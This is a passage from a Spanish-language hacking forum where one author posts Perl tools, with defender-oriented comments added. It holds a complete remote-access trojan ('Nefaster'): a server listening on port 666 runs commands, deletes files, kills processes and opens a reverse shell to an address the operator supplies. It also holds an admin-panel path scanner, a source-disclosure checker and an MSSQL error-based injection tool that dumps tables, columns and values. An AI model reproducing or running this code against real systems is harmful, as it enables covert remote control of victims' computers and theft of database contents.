# asking the script to serve itself; the response is then searched for a
# header(... "Content-Disposition: attachment;" call, which only appears when
# the script's source code was returned instead of being executed.
# Defender view: a download endpoint should resolve an identifier to a file
# from a fixed directory and never accept a path from the request.
sub fsd {
my $page = shift;
# Only $path is used; the other URL components are discarded.
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

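# Return the arguments with duplicates removed, keeping first-seen order.
# The seen-set and the result list are lexical, so every call starts clean.
# The original kept both in package globals (%repety, @revisado) and therefore
# also returned, and filtered against, the items of every earlier call.
sub repes {
    my %seen;
    my @unique;
    for my $palabra (@_) {
        next if $seen{$palabra}++;
        push @unique, $palabra;
    }
    return @unique;
}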

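# Read the file named in $_[0] and return one entry per line, each reduced by
# clean() to the text up to and including its first "=". An unreadable file
# gives an empty list.
# The original collected into the package array @r, which google() also
# appends to, so the two result sets could mix. It also opened the file with
# a two-argument open on a bareword handle and never checked the result.
sub savewords {
    my ($path) = @_;

    open(my $fh, '<', $path) or return;
    my @cleaned;
    while (my $line = <$fh>) {
        my $prefix = clean($line);
        push @cleaned, $prefix;
    }
    close $fh;

    return @cleaned;
}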

sub men {
print "\n\n[+] Scan Type : \n\n";
print "[S] : SQL\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[A] : All\n\n";
print "\n[Option] : ";
chomp(my $option = <STDIN>);
return $option;
}

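# Return the part of $_[0] up to and including its first "=", or nothing when
# the string contains no "=".
# substr/index replace the original split followed by the one-element array
# slice @sacar[0], and the no-match case now returns explicitly instead of
# falling off the end of the sub.
sub clean {
    my ($text) = @_;
    my $pos = index($text, "=");
    return if $pos < 0;
    return substr($text, 0, $pos + 1);
}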

#The End
#Contact : doddy-hackman[at]hotmail[com]
#blog : doddy-hackman.blogspot.com

#488
Perl / [Perl] Panel Control 0.6
Julio 03, 2011, 09:48:11 PM
La nueva version de esta herramienta para buscar
el panel de administracion

Código: perl

#!usr/bin/perl
#Panel Control 0.6
#(C) Doddy Hackman 2011

use LWP::UserAgent;

@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <web>\n\n";
} else {
scan($ARGV[0]);
}
copyright();

# Request <base>/<path> for every entry of @panels, where <base> is $_[0], and
# print each URL whose response reports success (HTTP::Response::is_success).
# $path and $code are not declared here, so they are package globals.
# Defender view: from the server side this is one client requesting several
# hundred administration paths in sequence, most of them ending in 404, all
# with the fixed User-Agent set on $nave. Alerting on that burst and keeping
# administration pages behind authentication or network restrictions, rather
# than relying on an unguessable path, are the relevant controls.
sub scan {
print "\n[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = toma($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
}
}
}

sub head {
print "\n\n-- == Panel Control == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0]);
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
#489
Perl / [Perl] Nefaster
Julio 03, 2011, 09:47:59 PM
Bueno, este es mi troyano Nefaster; en esta versión le arreglé varias cosas que paso a detallar:

  • Mostrar Informacion

  • Navegador de archivos

  • Cambiar directorio de navegacion
  • Crear archivo
  • Borrar archivo
  • Borrar directorio
  • Reproducir musica o videos poniendo la ruta en la opcion
  • Parar reproduccion

  • Abrir lectora de CD
  • Cerrar lectora de CD
  • Puertos abiertos
  • Mensaje
  • Ejecutar comandos
  • Esconder barra de tareas
  • Devolver barra de tareas
  • Esconder iconos del escritorio
  • Devolver iconos del escritorio
  • Administrar procesos con posibilidad de cerrar el que quieran
  • Reverse Shell si es que quieren ejecutar comandos de forma mas comoda


    El codigo del cliente es este

    Código: perl

    #!usr/bin/perl
    #Nefester (Cliente) 0.1 By Doddy H


    use IO::Socket;
    use Cwd;

    &menu;

    sub head {

    system 'cls';

    print q(


                E      F                   TT    E       
    NNNNNNNEEEEEE FFFFFF   AAA   SSSSSTTTTTTEEEEEE RRRRRR
    NN NN  E EE   FFFF   A AA  S  S T TT T  E EE   RRRRR
    NNNNN  E EE   FF F   AAAAA S     T TT   E EE   RR  R
    NNNNN EEEEE  FFFFF  AAA AA  SSS S  TT  EEEEE  RRRRR 
    NNNNN  E EEE  FFF    AAAAA S  SSS  TT   E EEE  RR R 
    NN NN  EEEE E FF    AAA AA SS  SS  TT   EEEE E RR  R
    NNN NN EEEEEEEFFFF  AAA  AAA  SSS  TTTT EEEEEEE RRR RR
                                SS                 R   R 



    );

    }

    # First screen of the client: ask for a target address and test whether
    # the server component answers there.
    # Defender view: the test is nothing more than a TCP connect to port 666
    # with a 5-second timeout, so the client treats any listener on that port
    # as its server. An unexpected listener on TCP/666 on a workstation, or
    # repeated inbound connection attempts to that port, is the network
    # indicator this page provides.
    sub menu {

    &head;

    print "[Target] : ";
    chomp(my $ip = <STDIN>);



    my $socket = new IO::Socket::INET(
    PeerAddr => $ip,
    PeerPort => 666,
    Proto => 'tcp',
    Timeout  => 5
    );

    # The probe connection is closed at once; menuo() receives only the address.
    if ($socket) {
    $socket->close;
    &menuo($ip);
    } else {
    # No listener: report it, wait for Enter and start over by calling menu again.
    print "\n\n[-] Target no infectado\n";
    <STDIN>;
    &menu;
    }

    }

    sub menuo {

    &head;

    print "[$_[0]] : Servidor Activado\n\n";
    print q(
    1 : Informacion
    2 : Navegador
    3 : Abrir CD
    4 : Cerrar CD
    5 : Puertos abiertos
    6 : Mensaje
    7 : CMD
    8 : Esconder barra de tareas
    9 : Devolver barra de tareas
    10 : Esconder iconos
    11 : Devolver iconos
    12 : Administrar procesos
    13 : Reverse Shell
    14 : Cambiar IP
    15 : Salir


    );
    print "[Opcion] : ";
    chomp(my $opcion = <STDIN>);


    if ($opcion eq 1) {
    print "\n\n[+] Informacion\n\n";
    $re = daryrecibir($_[0],"infor");
    if ($re=~/:(.*):(.*):(.*):(.*):(.*):/) {
    print "[Dominio] : $1\n";
    print "[Chip] : $2\n";
    print "[Version] : $3\n";
    print "[Nombre] : $4\n";
    print "[OS] : $5\n";
    <stdin>;
    }
    &menuo($_[0]);
    }
    elsif ($opcion eq 2) {

    menu1:
    print "\n\n[+] Navegacion de archivos\n\n";
    $cwd = daryrecibir($_[0],"getcwd"."\r\n");
    print "tengo $cwd\n";
    show($_[0],"/");
    &menu2;

    sub menu2 {
    print "\n\n[Opciones]\n\n";
    print "1 - Cambiar directorio\n";
    print "2 - Crear archivo\n";
    print "3 - Borrar archivo\n";
    print "4 - Borrar directorio\n";
    print "5 - Reproducir musica\n";
    print "6 - Parar reproduccion\n";
    print "7 - Volver al menu inicial\n\n";
    print "[Opcion] : ";
    chomp(my $op = <stdin>);

    if ($op eq 1) {
    print "\n\n[+] Directorio : ";
    chomp (my $dir=<stdin>);
    $ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA");
    if ($ver=~/ok/ig) {
    print "\n\n[+] Directory changed\n\n";
    }
    show($_[0],$dir);
    &menu2;
    <stdin>;
    }

    elsif ($op eq 2) {

    print "\n\n[Nombre] : ";
    chomp(my $name = <stdin>);
    print "\n\n[Contenido] : ";
    chomp(my $code = <stdin>);

    daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY");

    print "\n\n[+] Archivo creado \n\n";
    <stdin>;
    }
    elsif ($op eq 3) {
    print "\n\n[Archivo a borrar] : ";
    chomp(my $file = <stdin>);
    $re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA");
    if ($re=~/ok/) {
    print "\n\n[+] Archivo Borrado\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    <stdin>;
    }

    elsif ($op eq 4) {
    print "\n\n[Directorio a borrar] : ";
    chomp(my $file = <stdin>);
    $re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA");
    if ($re=~/ok/) {
    print "\n\n[+] Directorio Borrado\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    <stdin>;
    }

    elsif ($op eq 5) {
    print "\n\n[Archivo] : ";
    chomp(my $file = <stdin>);
    print "\n\n[+] Reproduciendo\n\n";
    daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA");
    <stdin>;
    }
    elsif ($op eq 6) {
    print "\n\n[+] Reproduccion detenida\n\n";
    daryrecibir($_[0],"pararmusic");
    <stdin>;
    }
    elsif ($op eq 7) {
    &menuo($_[0]);
    }
    else {
    show($_[0],"/");
    }
    goto menu1;
    }
    }

    elsif ($opcion eq 3) {
    daryrecibir($_[0],"opencd");
    &menuo($_[0]);
    }

    elsif ($opcion eq 4) {
    daryrecibir($_[0],"closedcd");
    &menuo($_[0]);
    }

    elsif ($opcion eq 5) {
    print "\n[Puertos Abiertos]\n\n";
    $re = daryrecibir($_[0],"porters");
    while ($re=~/:(.*?):/ig) {
    if ($1 ne "") {
    print "[+] $1\n";
    }
    }
    <stdin>;
    &menuo($_[0]);
    }
    elsif ($opcion eq 6) {
    print "\n[Mensaje] : ";
    chomp (my $msg = <stdin>);
    daryrecibir($_[0],"msgbox $msg");
    <stdin>;
    &menuo($_[0]);
    }
    elsif ($opcion eq 7) {

    menu:

    my $cmd,$re;

    print "\n\n>";

    chomp(my $cmd= <stdin>);

    if ($cmd=~/exit/ig) {
    &menuo($_[0]);
    }

    $re = daryrecibir($_[0],"comando :$cmd:");
    print "\n".$re;
    goto menu;
    &menuo($_[0]);
    }
    elsif ($opcion eq 8) {
    daryrecibir($_[0],"iniciochau");
    &menuo($_[0]);
    }
    elsif ($opcion eq 9) {
    daryrecibir($_[0],"iniciovuelve");
    &menuo($_[0]);
    }
    elsif ($opcion eq 10) {
    daryrecibir($_[0],"iconochau");
    &menuo($_[0]);
    }
    elsif ($opcion eq 11) {
    daryrecibir($_[0],"iconovuelve");
    &menuo($_[0]);
    }

    elsif ($opcion eq 12) {

    &reload($_[0]);

    sub reload {

    my @pro;
    my @pids;

    my $sockex = new IO::Socket::INET(
    PeerAddr => $_[0],
    PeerPort => 666,
    Proto => 'tcp',
    Timeout  => 5
    );

    print $sockex "mostrarpro"."\r\n";
    $sockex->read($re,5000);
    $sockex->close;

    chomp $re;

    print "\n\n[+] Procesos encontrados\n\n";

    while ($re=~/PROXEC(.*?)PROXEC/ig) {
    if ($1 ne "") {
    push(@pro,$1);
    }
    }

    while ($re=~/PIDX(.*?)PIDX/ig) {
    if ($1 ne "") {
    push(@pids,$1);
    }
    }

    $cantidad = int(@pro);

    for my $num(1..$cantidad) {
    if ($pro[$num] ne "") {
    print "\n[+] Proceso : ".$pro[$num]."\n";
    print "[+] PIDS : ".$pids[$num]."\n";
    }
    }

    print q(

    [Opciones]


    1 - Refrescar lista
    2 - Cerrar procesos
    3 - Volver al menu

    );

    print "\n[Opcion] :  ";
    chomp(my $opc = <stdin>);

    if ($opc=~/1/ig) {
    &reload($_[0]);
    }
    elsif($opc=~/2/ig) {
    print "\n[+] Write the name of the process : ";
    chomp(my $numb = <stdin>);
    print "\n[+] Write the PID of the process : ";
    chomp(my $pid = <stdin>);
    $re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA");
    if ($re=~/ok/ig) {
    print "\n\n[+] Proceso cerrado\n\n";
    } else {
    print "\n\n[-] Error\n\n";
    }
    <stdin>;
    &reload($_[0]);
    }
    elsif($opc=~/3/ig) {
    &menuo($_[0]);
    }
    else {
    &reload;
    }
    }
    }

    elsif ($opcion eq 13) {
    print "\n\n[IP] : ";
    chomp(my $ip = <stdin>);
    print "\n\n[Port] : ";
    chomp(my $port = <stdin>);
    print "\n\n[+] Connected !!!\n\n";
    $re = daryrecibir($_[0],"backshell :$ip:$port:");
    }
    elsif ($opcion eq 14) {
    &menu;
    }
    elsif ($opcion eq 15) {
    exit 1;
    }
    else {
    &menuo;
    }
    }

    # daryrecibir(host, command): open a TCP connection to host on port 666,
    # send the command string followed by CRLF, read up to 5000 bytes of reply
    # into the global $re, close the socket and return the reply with "\r"
    # appended.
    #
    # Defender notes: every action in this client goes through this helper, so
    # the traffic is a series of short-lived cleartext TCP sessions to port 666,
    # each carrying a single command line. Nothing in this sub authenticates or
    # encrypts the exchange; the command keywords and the K0BRA / ACATOY
    # delimiters supplied by the callers travel verbatim and can be used as
    # network signatures.
    sub daryrecibir {

    my $sockex = new IO::Socket::INET(
    PeerAddr => $_[0],
    PeerPort => 666,
    Proto => 'tcp',
    Timeout  => 5
    );

    # One command per connection, terminated with CRLF.
    print $sockex $_[1]."\r\n";
    # $re is not declared with my here, so the reply lands in a package global.
    $sockex->read($re,5000);
    $sockex->close;
    return $re."\r";
    }

    # show(host): ask the remote side for its current working directory, then
    # for a listing of that directory, and print the directory and file names
    # found in the reply.
    #
    # Defender notes: the two requests appear on the wire as "getcwd" and
    # "dirnow ACATOY<path>ACATOY"; the listing comes back as names wrapped in
    # DIREX...DIREX (directories) and FILEX...FILEX (files). These literal
    # markers are constant across sessions and usable in network signatures.
    sub show {

    # The extra "\r\n" is appended here and again inside daryrecibir.
    my $re = daryrecibir($_[0],"getcwd"."\r\n");
    print "\n\n[+] Directorio Actual : $re\n\n";
    # $re1 is a package global (no my).
    $re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n");
    print "\n\n[Directorios]\n\n";

    # Print every non-empty DIREX-delimited entry.
    while ($re1=~/DIREX(.*?)DIREX/ig) {
    if ($1 ne "") {
    print "[+] $1\n";
    }
    }

    print "\n\n[Archivos]\n\n";

    # Print every non-empty FILEX-delimited entry.
    while ($re1=~/FILEX(.*?)FILEX/ig) {
    if ($1 ne "") {
    print "[+] $1\n";
    }
    }

    }

    #
    # ¿ The End ?
    #


    Y el server

    Código: perl


    #!/usr/bin/perl
    #Nefester (sERVidor) 0.1 By Doddy H
    #Compilar con perl2exe para sacar consola

    use IO::Socket;
    use Socket;
    use Win32;
    use Cwd;
    use Win32::MediaPlayer;
    use Win32::Process::List;
    use Win32::Process;
    use Win32::API;

    use constant SW_HIDE => 0;
    use constant SW_SHOWNORMAL => 1;

    # Bindings to user32 FindWindow and ShowWindow; the icono_* / inicio_* subs
    # later in this script use them to look up a window and show or hide it.
    # Note that $a and $b are also the names Perl's sort uses.
    my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N');
    my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N');

    # Media player object shared by the playmusic / pararmusic handlers.
    $test = new Win32::MediaPlayer;

    # Defender notes: this is a plain TCP listener on port 666 with a backlog of
    # 10. No LocalAddr is given, so it is not restricted to one interface, and
    # nothing after accept() authenticates the peer before its line is acted on.
    # An unexpected process listening on TCP 666 (the header comment says the
    # script is meant to be compiled with perl2exe) is the host-side indicator;
    # blocking unsolicited inbound connections at the host firewall prevents the
    # listener from being reached.
    my $sock = IO::Socket::INET->new(LocalPort => 666,
    Listen => 10,
    Proto => 'tcp',
    Reuse => 1);

    print "online\n";

    while (my $con = $sock->accept){
    $resultado = <$con>;
    print "boludo mando : $resultado\n";

    if ($resultado=~/msgbox (.*)/ig) {
    Win32::MsgBox($1,0,"Mensaje de Dios")
    }

    if ($resultado=~/backshell :(.*):(.*):/ig) {

    my ($ip,$port) = ($1,$2);

    print "conectando $ip con $port\n";

    $ip =~s/(\s)+$//;
    $port =~s/(\s)+$//;

    conectar($ip,$port);
    tipo();

    # conectar(ip, port): create a TCP socket, connect it to ip:port and reopen
    # STDIN, STDOUT and STDERR as duplicates of that socket.
    #
    # Defender notes: ip and port are taken from the "backshell :ip:port:" line
    # received on the listener, so the destination is chosen by whoever reached
    # port 666. After this call the process's standard handles point at the
    # outbound connection, and the shell started next by tipo() inherits them.
    # The pattern to alert on is this process making an outbound TCP connection
    # and then spawning cmd.exe (or sh -i) as a child; egress filtering that
    # only allows expected destinations stops the connection itself.
    sub conectar {
    socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
    open (STDIN,">&REVERSE");
    open (STDOUT,">&REVERSE");
    open (STDERR,">&REVERSE");
    }

    sub tipo {
    print "\n[*] Reverse Shell Starting...\n\n";
    if ($^O =~/Win32/ig) {
    infowin();
    system("cmd.exe");
    } else {
    infolinux();
    #root(); 
    system("export TERM=xterm;exec sh -i");
    }
    }

    sub infowin {
    print "[+] Domain Name : ".Win32::DomainName()."\n";
    print "[+] OS Version : ".Win32::GetOSName()."\n";
    print "[+] Username : ".Win32::LoginName()."\n\n\n";
    }

    sub infolinux {
    print "[+] System information\n\n";
    system("uname -a");
    print "\n\n";
    }


    }

    if ($resultado =~/opencd/ig) {

    use Win32::API;

    my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
    my $rta = ' ' x 127; 
    $ventana->Call('set CDAudio door open', $rta, 127, 0);
    print $con "ok"."\r\n";
    }

    if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) {

    my ($pid,$numb) = ($1,$2);

    $pid=~s/(\s)+$//;
    $numb=~s/(\s)+$//;

    if (Win32::Process::KillProcess($pid,$numb)) {
    print $con "ok\r\n";
    }
    }

    if ($resultado =~/closedcd/ig) {

    use Win32::API;

    my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
    my $rta = ' ' x 127; 
    $ventana->Call('set CDAudio door closed', $rta, 127, 0);
    print $con "ok"."\r\n";
    }

    if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) {

    my $filex = $1;

    $filex =~s/(\s)+$//;

    print getcwd()."/".$filex."\n\n";

    if (unlink(getcwd()."/".$filex)) {
    print $con "ok\r\n";
    }

    }



    if ($resultado=~/infor/ig) {
    print "mando";
    use Win32;


    my $domain = Win32::DomainName();
    my $chip = Win32::GetChipName();
    my $version = Win32::GetOSVersion();
    my $nombre = Win32::LoginName();
    my  $os = Win32::GetOSName();

    print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n";
    }


    if ($resultado=~/porters/ig) {

    use Net::Netstat::Wrapper;

    $por = "";
    @ports = Net::Netstat::Wrapper->only_port();
    for(@ports) {
    $por = $por.":".$_;
    }
    print $con $por."\r\n";
    }


    if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) {

    my $cancion = $1;

    $cancion =~s/(\s)+$//;

    $test->load($cancion);
    $test->play;

    }

    if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) {

    my $dir = $1;
    $dir =~s/(\s)+$//;


    if (chdir($dir)) {
    print $con "ok\r\n";
    }

    }

    if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) {

    my $veox = $1;
    $veox =~s/(\s)+$//;

    if (rmdir(getcwd()."/".$veox)) {
    print $con "ok\r\n";
    }
    }



    if ($resultado=~/pararmusic/ig) {
    $test->close;
    }



    if ($resultado=~/dirnow ACATOY(.*)/ig) {

    my $real = $1;
    chomp $real;

    $real =~s/(\s)+$//;

    print "real $real\n\n";

    my @archivos = coleccionar($real);

    for (@archivos) {
    print $_."\n";
    my $todo = $real."/".$_;

    print $todo."\n";

    if (-f $todo) {
    print $con "FILEX".$_."FILEX"."\r\n";
    print "File : ".$_."\n";
    }

    if (-d $todo) {
    print $con "DIREX".$_."DIREX"."\r\n";
    print "Dir : ".$_."\n";
    }

    }
    }

    sub coleccionar {
    opendir DIR,$_[0];
    my @archivos = readdir DIR;
    close DIR;
    return @archivos;
    }

    if ($resultado=~/getcwd/ig) {
    print "envie ".getcwd()."\n\n";
    print $con getcwd()."\r\n";
    }


    if ($resultado=~/mostrarpro/ig) {


    my $new = Win32::Process::List->new(); 
    my %process = $new->GetProcesses();
    for my $pid (keys %process) {
    print $con "PROXEC".$process{$pid}."PROXEC\r\n";
    print $con "PIDX".$pid."PIDX\r\n";

    }


    }

    if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) {
    my $name = $1;
    my $file = $2;

    chomp $name;
    chomp $file;

    $name =~s/(\s)+$//;
    $file =~s/(\s)+$//;

    print "name is $name end\n";
    print "file is $file end\n";

    open FILE,">>".$name;
    print FILE $file."\n";
    close FILE;
    }

    if ($resultado=~/comando :(.*):/ig) {
    print "llego comando $1\n";
    print $resultado;
    my $temp = qx($1);
    print $con $temp."\r";
    }

    if ($resultado=~/iniciochau/g) {
    inicio_chau("Shell_TrayWnd");
    }
    if ($resultado=~/iniciovuelve/g) {
    inicio_vuelve("Shell_TrayWnd");
    } else {
    print $resultado;
    }
    if ($resultado=~/iconovuelve/g) {
    icono_vuelve("Program Manager");
    }
    if ($resultado=~/iconochau/g) {
    icono_chau("Program Manager");
    }


    sub icono_vuelve {
    $handle = $a->Call(0,$_[0]);
    $b->Call($handle,SW_SHOWNORMAL);

    }

    sub icono_chau {

    $handle = $a->Call(0,$_[0]);
    $b->Call($handle,SW_HIDE);

    }

    sub inicio_vuelve {
    $handlex = $a->Call($_[0],0);
    $b->Call($handlex,SW_SHOWNORMAL);

    }

    sub inicio_chau {

    $handlea = $a->Call($_[0],0);
    $b->Call($handlea,SW_HIDE);

    }


    }


    # ¿ The End ?



    Si lo quieren descargar desde sourceforge

    Código: php

    https://sourceforge.net/projects/nefaster/
#490
Perl / [Perl] MSSQL T00l
Julio 03, 2011, 09:47:39 PM
Bueno, acá les traigo una tool en Perl para
buscar tablas y columnas con information_schema en MSSQL.
También pueden sacar los valores que quieran de las columnas.

Código: perl

#!usr/bin/perl
#MSSQL T00l
#(C) Doddy Hackman 2011


use LWP::UserAgent;
use HTTP::Request::Common;

# Shared HTTP client; toma() sends every request of this script through it.
my $nave = LWP::UserAgent->new();
# Give up on a request after 13 seconds.
$nave->timeout(13);
# Fixed browser-like User-Agent. Defender note: the value is identical on every
# request and has no space between "Gecko/20080201" and "Firefox/2.0.0.12", so
# the exact string is a usable search key in web-server access logs.
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

sub head {
print q(

@@    @@   @@@@  @@@@   @@@    @@     @@@@@@  @@@      @@@    @@ 
@@@  @@@  @@  @ @@  @  @@@@@   @@       @@   @@@@@    @@@@@   @@ 
@@@  @@@  @@    @@    @@   @@  @@       @@  @@   @@  @@   @@  @@ 
@@@@@@@@@@  @@@   @@@  @@   @@  @@       @@  @@   @@  @@   @@  @@ 
@@ @@@@ @@    @@    @@ @@ @@@@  @@       @@  @@   @@  @@   @@  @@ 
@@  @@  @@ @  @@ @  @@  @@@@@   @@       @@   @@@@@    @@@@@   @@ 
@@  @@  @@ @@@@  @@@@    @@@@@  @@@@     @@    @@@      @@@    @@@@
                                                                 


);
}

sub copyright {
    # Show the author credit, wait for the user to press Enter, then leave the
    # program with exit status 1.
    my $credit = "\n\n(C) Doddy Hackman 2011\n\n";
    print $credit;
    my $ack = <stdin>;
    exit(1);
}

repe();

sub repe {

system("cls");


head();


print "\n\n[Page] : ";
chomp(my $page=<stdin>);

$code = toma($page);

if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
print "\n\n[+] The page is vulnerable to MSSQL Injection\n\n";
} else {
print "\n\n[-] Not vulnerable\n\n";
#copyright();
}

menu:

print q(

##################################

1 - Dump tables
2 - Dump Columns of the a table
3 - Dump values
4 - Change target
5 - Exit

##################################


);

print "[Opcion] : ";
chomp(my $op=<stdin>);

if ($op eq 1) {
print "\n\n[*] Dumping tables...\n\n";
mssql_tables($page);
goto menu;
}
elsif ($op eq 2) {
print "\n\n[Table] : ";
chomp (my $tab = <stdin>);
print "\n\n[*] Dumping columns..\n\n";
mssql_columns($page,$tab);
goto menu;
}
elsif($op eq 3) {
print "\n\n[Table] : ";
chomp (my $tab=<stdin>);
print "\n\n[Column] : ";
chomp(my $col=<stdin>);
print "\n\n[*] Dumping values..\n\n";
mssql_data($page,$tab,$col);
goto menu;
}
elsif ($op eq 4) {
repe();
}
elsif ($op eq 5) {
copyright();
}
else {
goto menu;
}

#@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users");


# mssql_columns(url, table): request url up to 666 times with an appended
# condition built around convert(int,(select top 1 column_name from
# information_schema.columns ...)) and print each column name found in the
# response body. $pass1, $pass2, $path and $code are package globals.
#
# What this depends on, from the defending side:
#  - The name is read out of the database's own conversion-error text by the
#    /value '(.*?)' to/ match, so it only works where raw database errors are
#    returned to the client. Generic error pages remove that channel.
#  - The appended text only reaches the SQL statement if the page concatenates
#    the request parameter into its query; parameterized queries close that.
#  - A low-privilege database account limits what such a query can read.
# Detection: a burst of sequential GETs to one URL whose query string contains
# "convert(int,(" and "information_schema.columns", with a "not in (...)" list
# that grows by one quoted name per request.
sub mssql_columns {
# bypass("--") falls through to the default pair: "+" as separator, "--" as tail.
($pass1,$pass2) =  bypass("--");
# Accumulates the names already seen, as ",'name'" fragments.
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Column found : $1]\n";
} else {
# No error text matched: treated as the end of the list.
print "\n\n[+] Finish\n";
last;
}
}
}

# mssql_tables(url): request url up to 666 times with an appended condition
